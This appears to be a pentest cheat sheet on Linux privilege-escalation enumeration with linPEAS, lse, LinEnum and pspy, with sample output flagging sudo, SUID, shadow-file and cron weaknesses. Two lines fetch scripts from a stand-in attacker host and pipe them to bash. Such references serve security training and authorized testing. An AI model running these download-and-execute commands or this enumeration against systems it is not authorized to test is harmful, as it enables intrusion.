AUTOMATED ENUMERATION
Run linPEAS
Most comprehensive auto-enum — Highlights privesc vectors in color
curl http://ATTACKER_IP/linpeas.sh | bash
or: ./linpeas.sh | tee linpeas_output.txt
Example Output
linpeas output (color coded):
[+] Possible sudo pwnage:
(root) NOPASSWD: /usr/bin/vim
[+] SUID files:
/usr/bin/pkexec
[+] Writable cron scripts:
/opt/backup.sh
Run linux-smart-enumeration
Alternative to linPEAS — Different perspective
curl http://ATTACKER_IP/lse.sh | bash
Example Output
./lse.sh
[!] usr010 Can we read /etc/shadow?... yes!
[!] fst020 Uncommon setuid binaries... /opt/custom_app
[!] ctn000 Is the user in a docker group?... yes!
(Different checks than linPEAS, use both)
Run LinEnum
Thorough mode — Classic enum script
bash LinEnum.sh -t
Example Output
bash LinEnum.sh -t
[+] Current user/group info:
uid=33(www-data)
[+] Possible sudo pwnage:
/usr/bin/vi
[+] SUID files:
/usr/bin/pkexec
pspy (process snooping)
Watch processes without root — Catch cron jobs and background tasks
./pspy64
./pspy32
Example Output
./pspy64
2026/02/24 10:00:01 CMD: UID=0 PID=1234 /bin/bash /opt/cleanup.sh
2026/02/24 10:05:01 CMD: UID=0 PID=1235 /usr/bin/python3 /root/backup.py
(Root cron jobs revealed that aren't in crontab)